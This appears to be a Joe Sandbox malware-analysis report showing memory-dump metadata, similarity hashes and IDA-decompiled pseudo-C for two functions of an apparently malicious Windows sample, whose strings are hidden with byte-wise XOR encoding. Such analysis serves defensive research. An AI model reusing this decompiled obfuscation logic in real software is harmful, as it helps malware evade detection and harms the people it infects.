                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "$"$#$&$+$+$-$:$B$C$D$H$W$[$_$b$d$h$p
                                                                    • API String ID: 0-4231965175
                                                                    • Opcode ID: 87865654377b863bddd277a9cbcc12e4798a282b090402448453351c98241cb7
                                                                    • Instruction ID: 31ef18161fadce59c531c2d242bf1afe659b6137b2b03b03e49e56b792f88003
                                                                    • Opcode Fuzzy Hash: 87865654377b863bddd277a9cbcc12e4798a282b090402448453351c98241cb7
                                                                    • Instruction Fuzzy Hash: DB223D7540D7C18EC321CB68844469BFFE1ABEA314F484A5EF5D897392C3749609CBAB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 51%
                                                                    			E00414310(void* __ecx, void* __eflags, char _a1, char _a2, char _a3, signed int* _a4, char _a5, char _a6, char _a7, char _a8, char _a9, char _a10, char _a11, char _a12, char _a13, char _a14, char _a15, char _a16, intOrPtr _a20, char _a24, char _a25, char _a26, char _a27, char _a28, char _a32, char _a33, char _a34, char _a35, char _a36, char _a37, char _a38, char _a39, char _a40, char _a41, char _a42, char _a43, char _a44, char _a45, char _a46, char _a47, char _a48, char _a49, char _a50, char _a51, char _a52, char _a53, char _a54, char _a55, char _a56, char _a57, char _a58, char _a59, char _a60, char _a61, char _a62, char _a63, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, char _a70, char _a71, char _a72, char _a73, char _a74, char _a75, char _a76, char _a77, char _a78, char _a79, char _a80, char _a81, char _a82, char _a83, char _a84, char _a85, char _a86, char _a87, char _a88, char _a89, char _a90, char _a91, char _a92, char _a93, char _a96, char _a97, char _a98, char _a99, char _a100, char _a101, char _a102, char _a103, char _a104, char _a105, char _a106, char _a107, char _a108, char _a109, char _a110, char _a111, char _a112, char _a113, char _a114, char _a115, char _a116, char _a117, char _a120, char _a244, char _a248, void* _a1252, void* _a1256, void _a1272, void _a3320) {
                                                                    				signed int _v0;
                                                                    				char _v1;
                                                                    				signed int _v2;
                                                                    				intOrPtr _v4;
                                                                    				signed int _v6;
                                                                    				signed int _t252;
                                                                    				void* _t257;
                                                                    				signed int _t258;
                                                                    				signed int _t259;
                                                                    				signed short _t262;
                                                                    				void* _t263;
                                                                    				signed int _t265;
                                                                    				signed int _t266;
                                                                    				signed int* _t316;
                                                                    				signed int _t323;
                                                                    				signed int _t326;
                                                                    				signed int _t330;
                                                                    				int _t364;
                                                                    				void* _t367;
                                                                    				char _t394;
                                                                    				signed int _t395;
                                                                    				signed int _t396;
                                                                    				signed int _t402;
                                                                    				signed int _t403;
                                                                    				void* _t404;
                                                                    
                                                                    				_t403 = _t402 & 0xfffffff8;
                                                                    				E00422920(0x10fc, __ecx);
                                                                    				_a68 = 0xa7;
                                                                    				_a69 = 0xa7;
                                                                    				_a70 = 0xa7;
                                                                    				_a73 = 0xb5;
                                                                    				_a80 = 0xb5;
                                                                    				_a77 = 0xbe;
                                                                    				_a88 = 0xbe;
                                                                    				_a87 = 0xbf;
                                                                    				_a91 = 0xbf;
                                                                    				_t252 =  *0x447cfc; // 0x0
                                                                    				_a78 = 0xbd;
                                                                    				_a92 = 0xbd;
                                                                    				_t323 = _a20 + (_t252 - _a20 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    				_a71 = 0xe3;
                                                                    				_a72 = 0xfe;
                                                                    				_a74 = 0xa2;
                                                                    				_a75 = 0xa4;
                                                                    				_a76 = 0xb9;
                                                                    				_a79 = 0xb4;
                                                                    				_a81 = 0xa3;
                                                                    				_a82 = 0xb1;
                                                                    				_a83 = 0xb3;
                                                                    				_a84 = 0xb8;
                                                                    				_a85 = 0xbc;
                                                                    				_a86 = 0xb9;
                                                                    				_a89 = 0xfe;
                                                                    				_a90 = 0xb3;
                                                                    				_a93 = 0xd0;
                                                                    				_t364 = 0;
                                                                    				goto L1;
                                                                    				do {
                                                                    					L6:
                                                                    					if(_t326 >= 0x2d) {
                                                                    						_t326 = _t326 * 0x2e;
                                                                    					} else {
                                                                    						_t326 = _t326 ^ 0x00000022;
                                                                    					}
                                                                    					 *(_t403 + _t257 + 0x30) =  *(_t403 + _t257 + 0x30) ^ 0x0000007f;
                                                                    					_t257 = _t257 + 1;
                                                                    				} while (_t257 < 0x10);
                                                                    				_t258 = _v2;
                                                                    				if(_t258 >= 0x6f) {
                                                                    					_t259 = _t258 * 0x18;
                                                                    				} else {
                                                                    					_t259 = _t258 * 0x17;
                                                                    				}
                                                                    				_v2 = _t259;
                                                                    				memset( &_a3320, 0, 0x100 << 2);
                                                                    				_t404 = _t403 + 0xc;
                                                                    				_t262 = _v2 & 0x000000ff;
                                                                    				_t330 = _t262 & 0x2f;
                                                                    				_t367 = 0x69;
                                                                    				_t394 = 0x47;
                                                                    				_t263 = _t262 + 0xb162;
                                                                    				do {
                                                                    					_t367 = _t367 - _t330;
                                                                    					_t394 = _t394 - 1;
                                                                    				} while (_t394 != 0);
                                                                    				_t395 = _t263 + _t367 - 0xc;
                                                                    				E0041E5F0();
                                                                    				if(_t395 >= 0x5a) {
                                                                    					_t396 = _t395 * 0x6d;
                                                                    				} else {
                                                                    					_t396 = _t395 + 0xffad;
                                                                    				}
                                                                    				_t316 = _a4;
                                                                    				_t265 =  *_t316;
                                                                    				_v0 = _t396;
                                                                    				if(_t265 > 4) {
                                                                    					_t266 =  *0x447cfc; // 0x0
                                                                    					if(_t266 >= 0x2c) {
                                                                    						 *0x447cfc = _t266 + 0x42;
                                                                    						return 1;
                                                                    					} else {
                                                                    						 *0x447cfc = _t266 * 0x4f;
                                                                    						return 1;
                                                                    					}
                                                                    				} else {
                                                                    					switch( *((intOrPtr*)(_t265 * 4 +  &M004149C8))) {
                                                                    						case 0:
                                                                    							_a98 = 0xad;
                                                                    							_a103 = 0xad;
                                                                    							_a105 = 0xf8;
                                                                    							_a110 = 0xf8;
                                                                    							_a115 = 0xf8;
                                                                    							_v1 = 0xdd;
                                                                    							_a96 = 0xa9;
                                                                    							_a97 = 0xa4;
                                                                    							_a99 = 0xb8;
                                                                    							_a100 = 0xe0;
                                                                    							_a101 = 0xae;
                                                                    							_a102 = 0xfb;
                                                                    							_a104 = 0xe0;
                                                                    							_a106 = 0xb9;
                                                                    							_a107 = 0xfb;
                                                                    							_a108 = 0xaf;
                                                                    							_a109 = 0xe0;
                                                                    							_a111 = 0xb9;
                                                                    							_a112 = 0xfb;
                                                                    							_a113 = 0xb0;
                                                                    							_a114 = 0xe0;
                                                                    							_a116 = 0xb9;
                                                                    							_a117 = 0xdd;
                                                                    							_t274 = E004142C0(0x16,  &_a96,  &_v1);
                                                                    							_push(_t316[3]);
                                                                    							_push(_t316[2]);
                                                                    							_push(_t316[1]);
                                                                    							_push(_t274);
                                                                    							_push( &_a244);
                                                                    							 *0x44aec8();
                                                                    							_t405 = _t404 + 0x14;
                                                                    							_v6 = _v6 + ((_v6 & 0x000000ff) - _v4 + 0x00000042 ^ 0x0000004d) * 0x32;
                                                                    							goto L28;
                                                                    						case 1:
                                                                    							__eax =  &_v1;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 7;
                                                                    							_v1 = 0x22;
                                                                    							_v0 = 0x56;
                                                                    							_a1 = 0x5b;
                                                                    							_a2 = 0x52;
                                                                    							_a3 = 0x47;
                                                                    							_a4 = 0x1f;
                                                                    							_a5 = 0x44;
                                                                    							_a6 = 0x22;
                                                                    							_push(E004142C0(7,  &_v0,  &_v1));
                                                                    							__ecx =  &_a244;
                                                                    							_push( &_a244);
                                                                    							__eax =  *0x44aec8();
                                                                    							__esp = __esp + 8;
                                                                    							goto L28;
                                                                    						case 2:
                                                                    							__al = 0x7b;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 0xc;
                                                                    							_v1 = 0x46;
                                                                    							_v0 = 0x32;
                                                                    							_a1 = 0x3f;
                                                                    							_a2 = 0x36;
                                                                    							_a3 = 0x23;
                                                                    							_a4 = 0x7b;
                                                                    							_a5 = 0x27;
                                                                    							_a6 = 0x60;
                                                                    							_a7 = 0x28;
                                                                    							_a8 = 0x7b;
                                                                    							_a9 = 0x63;
                                                                    							_a10 = 0x22;
                                                                    							_a11 = 0x46;
                                                                    							__eax = E004142C0(0xc,  &_v0,  &_v1);
                                                                    							__ecx =  *((intOrPtr*)(__ebx + 4));
                                                                    							_push( *((intOrPtr*)(__ebx + 4)));
                                                                    							_push(__eax);
                                                                    							_push( &_a244);
                                                                    							__eax =  *0x44aec8();
                                                                    							__al = _v6;
                                                                    							__esp = __esp + 0xc;
                                                                    							if(__al >= 0x6f) {
                                                                    								__eax = __eax * 0x18;
                                                                    							} else {
                                                                    								__eax = __eax * 0x17;
                                                                    							}
                                                                    							goto L27;
                                                                    						case 3:
                                                                    							__al = 0x6c;
                                                                    							_a4 = 0x6c;
                                                                    							_a8 = 0x6c;
                                                                    							_a13 = 0x6c;
                                                                    							__eax =  &_v1;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 0x11;
                                                                    							_v1 = 0x51;
                                                                    							_v0 = 0x25;
                                                                    							_a1 = 0x28;
                                                                    							_a2 = 0x21;
                                                                    							_a3 = 0x34;
                                                                    							_a5 = 0x3c;
                                                                    							_a6 = 0x77;
                                                                    							_a7 = 0x22;
                                                                    							_a9 = 0x74;
                                                                    							_a10 = 0x35;
                                                                    							_a11 = 0x77;
                                                                    							_a12 = 0x37;
                                                                    							_a14 = 0x74;
                                                                    							_a15 = 0x35;
                                                                    							_a16 = 0x51;
                                                                    							__eax = E004142C0(0x11,  &_v0,  &_v1);
                                                                    							__ecx =  *((intOrPtr*)(__ebx + 8));
                                                                    							_push( *((intOrPtr*)(__ebx + 8)));
                                                                    							_push( *((intOrPtr*)(__ebx + 4)));
                                                                    							_push(__eax);
                                                                    							__eax =  &_a244;
                                                                    							_push( &_a244);
                                                                    							__eax =  *0x44aec8();
                                                                    							__al = _v6;
                                                                    							__esp = __esp + 0x10;
                                                                    							__al = _v6 ^ 0x00000048;
                                                                    							L27:
                                                                    							_v2 = __al;
                                                                    							goto L28;
                                                                    						case 4:
                                                                    							__al = 0xd7;
                                                                    							_a5 = 0xd7;
                                                                    							_a10 = 0xd7;
                                                                    							__eax =  &_v1;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 0xc;
                                                                    							_v1 = 0xb3;
                                                                    							_v0 = 0xc7;
                                                                    							_a1 = 0xca;
                                                                    							_a2 = 0xc3;
                                                                    							_a3 = 0xd6;
                                                                    							_a4 = 0x8e;
                                                                    							_a6 = 0x95;
                                                                    							_a7 = 0xdd;
                                                                    							_a8 = 0x8e;
                                                                    							_a9 = 0x96;
                                                                    							_a11 = 0xb3;
                                                                    							__eax = E004142C0(0xc,  &_v0,  &_v1);
                                                                    							__ecx =  *((intOrPtr*)(__ebx + 4));
                                                                    							_push( *((intOrPtr*)(__ebx + 4)));
                                                                    							_push(__eax);
                                                                    							_push( &_a244);
                                                                    							__eax =  *0x44aec8();
                                                                    							__esp = __esp + 0xc;
                                                                    							L28:
                                                                    							_t281 = _v2;
                                                                    							if(_t281 >= 0x6f) {
                                                                    								_t282 = _t281 * 0x18;
                                                                    							} else {
                                                                    								_t282 = _t281 * 0x17;
                                                                    							}
                                                                    							_push(_t316);
                                                                    							_v2 = _t282;
                                                                    							L00421F9D();
                                                                    							E0042A2D2(0x16,  &_a120, 0x80);
                                                                    							_t375 =  *0x447cfc; // 0x0
                                                                    							_t287 = _v0 + (_t375 - _v0 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    							_t406 = _t405 + 0xc;
                                                                    							if(_t287 >= 0x2d) {
                                                                    								_t288 = _t287 * 0x2e;
                                                                    							} else {
                                                                    								_t288 = _t287 ^ 0x00000022;
                                                                    							}
                                                                    							_a24 = 0x33;
                                                                    							if(_t288 >= 0x2d) {
                                                                    								_v0 = _t288 * 0x2e;
                                                                    							}
                                                                    							_a27 = 0x33;
                                                                    							_a52 = 0xac;
                                                                    							_a59 = 0xac;
                                                                    							_a62 = 0xac;
                                                                    							_a65 = 0xac;
                                                                    							_a53 = 0xfa;
                                                                    							_a60 = 0xfa;
                                                                    							_a63 = 0xfa;
                                                                    							_a66 = 0xfa;
                                                                    							_t292 = _a20 + (_t375 - _a20 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    							_a25 = 0x2e;
                                                                    							_a26 = 0x30;
                                                                    							_a28 = 0;
                                                                    							_a48 = 0xdf;
                                                                    							_a49 = 0xec;
                                                                    							_a50 = 0xfb;
                                                                    							_a51 = 0xb4;
                                                                    							_a54 = 0xaf;
                                                                    							_a55 = 0xe5;
                                                                    							_a56 = 0xe0;
                                                                    							_a57 = 0xed;
                                                                    							_a58 = 0xb4;
                                                                    							_a61 = 0xaf;
                                                                    							_a64 = 0xaf;
                                                                    							_a67 = 0x89;
                                                                    							_t348 = 0;
                                                                    							do {
                                                                    								if(_t292 >= 0x2d) {
                                                                    									_t292 = _t292 * 0x2e;
                                                                    								} else {
                                                                    									_t292 = _t292 ^ 0x00000022;
                                                                    								}
                                                                    								 *(_t406 + _t348 + 0x40) =  *(_t406 + _t348 + 0x40) ^ 0x00000089;
                                                                    								_t348 = _t348 + 1;
                                                                    							} while (_t348 < 0x14);
                                                                    							memset( &_a1272, 0, 0x200 << 2);
                                                                    							 *0x447cfc = _t375 & _v2 & 0x000000ff;
                                                                    							_push( &_a3320);
                                                                    							_push( &_a248);
                                                                    							_push( &_a120);
                                                                    							E004228C1( &_a1272, 0x7ff,  &_a48,  &_a24);
                                                                    							_t391 =  *0x43003c;
                                                                    							_push(0);
                                                                    							_t300 = E00401390( *_t391(),  &_a1272);
                                                                    							_t409 = _t406 + 0x30;
                                                                    							_a16 = _t300;
                                                                    							_t400 = E0041ACD0(E0041AC50(), 0, _t300);
                                                                    							if(_t400 != 0) {
                                                                    								_push(0);
                                                                    								_push( &_a16);
                                                                    								_push(_t400);
                                                                    								_push(_t409 + 0x514);
                                                                    								_push( *_t391());
                                                                    								_push(_t409 + 0x518);
                                                                    								if(E00401400() != 0) {
                                                                    									_t309 =  *0x447cfc; // 0x0
                                                                    									if(_t309 >= 0x2c) {
                                                                    										_t310 = _t309 + 0x42;
                                                                    									} else {
                                                                    										_t310 = _t309 * 0x4f;
                                                                    									}
                                                                    									_push(_a12);
                                                                    									_push(_t400);
                                                                    									 *0x447cfc = _t310;
                                                                    									E00406C30( &_a60,  &_a24, 0x50);
                                                                    								}
                                                                    								E0041AD50(E0041AC50(), 0, _t400);
                                                                    							}
                                                                    							return 0;
                                                                    							goto L53;
                                                                    					}
                                                                    				}
                                                                    				L53:
                                                                    				L1:
                                                                    				if(_t323 >= 0x2d) {
                                                                    					_t323 = _t323 * 0x2e;
                                                                    				} else {
                                                                    					_t323 = _t323 ^ 0x00000022;
                                                                    				}
                                                                    				 *(_t403 + _t364 + 0x54) =  *(_t403 + _t364 + 0x54) ^ 0x000000d0;
                                                                    				_t364 = _t364 + 1;
                                                                    				if(_t364 < 0x1a) {
                                                                    					goto L1;
                                                                    				} else {
                                                                    					_a33 = 0x1c;
                                                                    					_a44 = 0x1c;
                                                                    					_t326 = _a20 + (_t252 - _a20 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    					_a32 = 0x50;
                                                                    					_a34 = 0x18;
                                                                    					_a35 = 0x16;
                                                                    					_a36 = 0x52;
                                                                    					_a37 = 0x1d;
                                                                    					_a38 = 0x16;
                                                                    					_a39 = 0x11;
                                                                    					_a40 = 0x50;
                                                                    					_a41 = 0xf;
                                                                    					_a42 = 0xd;
                                                                    					_a43 = 0x51;
                                                                    					_a45 = 0x18;
                                                                    					_a46 = 0x16;
                                                                    					_a47 = 0x7f;
                                                                    					_t257 = 0;
                                                                    				}
                                                                    				goto L6;
                                                                    			}




























                                                                    0x00414313
                                                                    0x0041431b
                                                                    0x00414325
                                                                    0x00414329
                                                                    0x0041432d
                                                                    0x00414333
                                                                    0x00414337
                                                                    0x0041433f
                                                                    0x00414343
                                                                    0x00414349
                                                                    0x0041434d
                                                                    0x00414351
                                                                    0x00414356
                                                                    0x0041435a
                                                                    0x00414371
                                                                    0x00414373
                                                                    0x00414378
                                                                    0x0041437c
                                                                    0x00414381
                                                                    0x00414386
                                                                    0x0041438b
                                                                    0x00414390
                                                                    0x00414395
                                                                    0x0041439a
                                                                    0x0041439f
                                                                    0x004143a4
                                                                    0x004143a9
                                                                    0x004143ae
                                                                    0x004143b2
                                                                    0x004143b7
                                                                    0x004143bc
                                                                    0x004143bc
                                                                    0x00414440
                                                                    0x00414440
                                                                    0x00414443
                                                                    0x0041444a
                                                                    0x00414445
                                                                    0x00414445
                                                                    0x00414445
                                                                    0x0041444d
                                                                    0x00414452
                                                                    0x00414453
                                                                    0x00414458
                                                                    0x0041445e
                                                                    0x00414468
                                                                    0x00414460
                                                                    0x00414462
                                                                    0x00414462
                                                                    0x0041446a
                                                                    0x0041447c
                                                                    0x0041447c
                                                                    0x0041447e
                                                                    0x00414487
                                                                    0x0041448a
                                                                    0x0041448f
                                                                    0x00414494
                                                                    0x004144a0
                                                                    0x004144a0
                                                                    0x004144a2
                                                                    0x004144a2
                                                                    0x004144a5
                                                                    0x004144a9
                                                                    0x004144b2
                                                                    0x004144bc
                                                                    0x004144b4
                                                                    0x004144b4
                                                                    0x004144b4
                                                                    0x004144bf
                                                                    0x004144c2
                                                                    0x004144c7
                                                                    0x004144cb
                                                                    0x00414991
                                                                    0x00414999
                                                                    0x004149b6
                                                                    0x004149c4
                                                                    0x0041499b
                                                                    0x0041499e
                                                                    0x004149ae
                                                                    0x004149ae
                                                                    0x004144d1
                                                                    0x004144d1
                                                                    0x00000000
                                                                    0x004144da
                                                                    0x004144de
                                                                    0x004144e4
                                                                    0x004144e8
                                                                    0x004144ec
                                                                    0x00414503
                                                                    0x00414507
                                                                    0x0041450c
                                                                    0x00414511
                                                                    0x00414516
                                                                    0x0041451b
                                                                    0x00414520
                                                                    0x00414525
                                                                    0x0041452a
                                                                    0x0041452f
                                                                    0x00414534
                                                                    0x0041453c
                                                                    0x00414544
                                                                    0x0041454c
                                                                    0x00414554
                                                                    0x0041455c
                                                                    0x00414564
                                                                    0x0041456c
                                                                    0x00414573
                                                                    0x0041457e
                                                                    0x00414582
                                                                    0x00414583
                                                                    0x00414584
                                                                    0x0041458c
                                                                    0x0041458d
                                                                    0x004145a8
                                                                    0x004145ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004145b6
                                                                    0x004145bb
                                                                    0x004145bf
                                                                    0x004145c4
                                                                    0x004145c9
                                                                    0x004145ce
                                                                    0x004145d3
                                                                    0x004145d8
                                                                    0x004145dd
                                                                    0x004145e2
                                                                    0x004145e7
                                                                    0x004145f1
                                                                    0x004145f2
                                                                    0x004145f9
                                                                    0x004145fa
                                                                    0x00414600
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041460a
                                                                    0x00414611
                                                                    0x00414615
                                                                    0x0041461a
                                                                    0x0041461e
                                                                    0x00414623
                                                                    0x00414628
                                                                    0x0041462d
                                                                    0x00414632
                                                                    0x00414636
                                                                    0x0041463b
                                                                    0x00414640
                                                                    0x00414645
                                                                    0x00414649
                                                                    0x0041464e
                                                                    0x00414653
                                                                    0x00414657
                                                                    0x0041465c
                                                                    0x0041465f
                                                                    0x00414660
                                                                    0x00414668
                                                                    0x00414669
                                                                    0x0041466f
                                                                    0x00414673
                                                                    0x00414678
                                                                    0x00414685
                                                                    0x0041467a
                                                                    0x0041467c
                                                                    0x0041467c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004146fb
                                                                    0x004146fd
                                                                    0x00414701
                                                                    0x00414705
                                                                    0x0041470d
                                                                    0x00414712
                                                                    0x00414716
                                                                    0x0041471b
                                                                    0x00414720
                                                                    0x00414725
                                                                    0x0041472a
                                                                    0x0041472f
                                                                    0x00414734
                                                                    0x00414739
                                                                    0x0041473e
                                                                    0x00414743
                                                                    0x00414747
                                                                    0x0041474b
                                                                    0x00414750
                                                                    0x00414755
                                                                    0x00414759
                                                                    0x0041475d
                                                                    0x00414762
                                                                    0x00414767
                                                                    0x0041476d
                                                                    0x0041476e
                                                                    0x0041476f
                                                                    0x00414770
                                                                    0x00414777
                                                                    0x00414778
                                                                    0x0041477e
                                                                    0x00414782
                                                                    0x00414785
                                                                    0x00414787
                                                                    0x00414787
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041468c
                                                                    0x0041468e
                                                                    0x00414692
                                                                    0x00414698
                                                                    0x0041469d
                                                                    0x004146a1
                                                                    0x004146a6
                                                                    0x004146ab
                                                                    0x004146b0
                                                                    0x004146b5
                                                                    0x004146ba
                                                                    0x004146bf
                                                                    0x004146c3
                                                                    0x004146c8
                                                                    0x004146cd
                                                                    0x004146d1
                                                                    0x004146d6
                                                                    0x004146db
                                                                    0x004146e0
                                                                    0x004146e3
                                                                    0x004146e4
                                                                    0x004146ec
                                                                    0x004146ed
                                                                    0x004146f3
                                                                    0x0041478b
                                                                    0x0041478b
                                                                    0x00414791
                                                                    0x0041479b
                                                                    0x00414793
                                                                    0x00414795
                                                                    0x00414795
                                                                    0x0041479d
                                                                    0x0041479e
                                                                    0x004147a2
                                                                    0x004147b4
                                                                    0x004147b9
                                                                    0x004147d0
                                                                    0x004147d2
                                                                    0x004147d8
                                                                    0x004147df
                                                                    0x004147da
                                                                    0x004147da
                                                                    0x004147da
                                                                    0x004147e7
                                                                    0x004147eb
                                                                    0x004147f5
                                                                    0x004147f5
                                                                    0x004147f9
                                                                    0x00414801
                                                                    0x00414805
                                                                    0x00414809
                                                                    0x0041480d
                                                                    0x00414811
                                                                    0x00414815
                                                                    0x00414819
                                                                    0x0041481d
                                                                    0x00414832
                                                                    0x00414834
                                                                    0x00414839
                                                                    0x0041483e
                                                                    0x00414843
                                                                    0x00414848
                                                                    0x0041484d
                                                                    0x00414852
                                                                    0x00414857
                                                                    0x0041485c
                                                                    0x00414861
                                                                    0x00414866
                                                                    0x0041486b
                                                                    0x00414870
                                                                    0x00414875
                                                                    0x0041487a
                                                                    0x0041487f
                                                                    0x00414881
                                                                    0x00414884
                                                                    0x0041488b
                                                                    0x00414886
                                                                    0x00414886
                                                                    0x00414886
                                                                    0x0041488e
                                                                    0x00414893
                                                                    0x00414894
                                                                    0x004148a7
                                                                    0x004148b0
                                                                    0x004148bd
                                                                    0x004148c5
                                                                    0x004148cd
                                                                    0x004148e5
                                                                    0x004148ea
                                                                    0x004148f3
                                                                    0x00414900
                                                                    0x00414905
                                                                    0x0041490b
                                                                    0x0041491a
                                                                    0x0041491e
                                                                    0x00414920
                                                                    0x00414926
                                                                    0x00414927
                                                                    0x0041492f
                                                                    0x00414932
                                                                    0x0041493a
                                                                    0x00414945
                                                                    0x00414947
                                                                    0x0041494f
                                                                    0x00414956
                                                                    0x00414951
                                                                    0x00414951
                                                                    0x00414951
                                                                    0x0041495d
                                                                    0x0041495e
                                                                    0x0041495f
                                                                    0x00414970
                                                                    0x00414975
                                                                    0x00414981
                                                                    0x00414981
                                                                    0x0041498e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004144d1
                                                                    0x00000000
                                                                    0x004143c0
                                                                    0x004143c3
                                                                    0x004143ca
                                                                    0x004143c5
                                                                    0x004143c5
                                                                    0x004143c5
                                                                    0x004143cd
                                                                    0x004143d2
                                                                    0x004143d6
                                                                    0x00000000
                                                                    0x004143d8
                                                                    0x004143da
                                                                    0x004143de
                                                                    0x004143f1
                                                                    0x004143f3
                                                                    0x004143f8
                                                                    0x004143fd
                                                                    0x00414402
                                                                    0x00414407
                                                                    0x0041440c
                                                                    0x00414411
                                                                    0x00414416
                                                                    0x0041441b
                                                                    0x00414420
                                                                    0x00414425
                                                                    0x0041442a
                                                                    0x0041442f
                                                                    0x00414434
                                                                    0x00414439
                                                                    0x00414439
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !$"$"$%$($.$0$4$7$<$P$P$Q$Q$Q$R$c$w$w
                                                                    • API String ID: 0-2260797450
                                                                    • Opcode ID: 340966d5f46b3de5162e844a0f350c40bbbb7f04e9c6634b5a1b26ca59dbda42
                                                                    • Instruction ID: 7a979fc8e47214274b4b9a001fe33a5b77939df83124664241806668bc464c82
                                                                    • Opcode Fuzzy Hash: 340966d5f46b3de5162e844a0f350c40bbbb7f04e9c6634b5a1b26ca59dbda42
                                                                    • Instruction Fuzzy Hash: 93126E7110C3C28AD322CA7C888469FBFD45BE7314F584A9EF1E58B3D2C6658649C7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E00413040(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v128;
                                                                    				char _v129;
                                                                    				char _v130;
                                                                    				char _v131;
                                                                    				char _v132;
                                                                    				char _v133;
                                                                    				char _v134;
                                                                    				char _v135;
                                                                    				char _v136;
                                                                    				char _v137;
                                                                    				char _v138;
                                                                    				char _v139;
                                                                    				char _v140;
                                                                    				char _v141;
                                                                    				char _v142;
                                                                    				char _v143;
                                                                    				char _v144;
                                                                    				char _v146;
                                                                    				char _v147;
                                                                    				char _v148;
                                                                    				char _v149;
                                                                    				char _v150;
                                                                    				char _v151;
                                                                    				char _v152;
                                                                    				char _v153;
                                                                    				char _v154;
                                                                    				char _v155;
                                                                    				char _v156;
                                                                    				char _v160;
                                                                    				char _v161;
                                                                    				char _v162;
                                                                    				char _v163;
                                                                    				char _v164;
                                                                    				signed int _v168;
                                                                    				char _v172;
                                                                    				char _v173;
                                                                    				char _v174;
                                                                    				char _v175;
                                                                    				char _v176;
                                                                    				char _v184;
                                                                    				char _v192;
                                                                    				void* __ebp;
                                                                    				signed int _t88;
                                                                    				signed int _t89;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    				intOrPtr* _t98;
                                                                    				signed int _t99;
                                                                    				void* _t105;
                                                                    				intOrPtr* _t106;
                                                                    				void* _t114;
                                                                    				intOrPtr* _t119;
                                                                    				intOrPtr* _t122;
                                                                    				intOrPtr* _t125;
                                                                    				intOrPtr* _t129;
                                                                    				intOrPtr _t132;
                                                                    				intOrPtr* _t135;
                                                                    				signed int _t140;
                                                                    				signed int _t147;
                                                                    				intOrPtr _t148;
                                                                    				signed int _t153;
                                                                    				intOrPtr _t155;
                                                                    				intOrPtr _t158;
                                                                    				intOrPtr _t160;
                                                                    				intOrPtr _t162;
                                                                    				void* _t166;
                                                                    				intOrPtr _t168;
                                                                    				void* _t177;
                                                                    				void* _t183;
                                                                    				void* _t184;
                                                                    				void* _t186;
                                                                    				void* _t187;
                                                                    				intOrPtr* _t188;
                                                                    				void* _t189;
                                                                    				intOrPtr* _t190;
                                                                    				intOrPtr _t195;
                                                                    				intOrPtr _t198;
                                                                    				void* _t199;
                                                                    				intOrPtr* _t200;
                                                                    				void* _t201;
                                                                    				void* _t202;
                                                                    				void* _t203;
                                                                    
                                                                    				_t201 =  &_v176;
                                                                    				_t140 =  *0x447b60; // 0x0
                                                                    				_t88 = _v168 + (0x00000003 - _v168 * _t140 & 0x00000004) * 0x65;
                                                                    				if(_t88 >= 0x77) {
                                                                    					_t89 = _t88 ^ 0x00000042;
                                                                    				} else {
                                                                    					_t89 = _t88 ^ 0x0000001d;
                                                                    				}
                                                                    				_v176 = 0x2e;
                                                                    				if(_t89 >= 0x77) {
                                                                    				}
                                                                    				_t92 = _v168 + (0x00000003 - _v168 * _t140 & 0x00000004) * 0x65;
                                                                    				_v175 = 0x7a;
                                                                    				_v174 = 0x69;
                                                                    				_v173 = 0x70;
                                                                    				_v172 = 0;
                                                                    				if(_t92 >= 0x77) {
                                                                    					_t93 = _t92 ^ 0x00000042;
                                                                    				} else {
                                                                    					_t93 = _t92 ^ 0x0000001d;
                                                                    				}
                                                                    				_v164 = 0x2e;
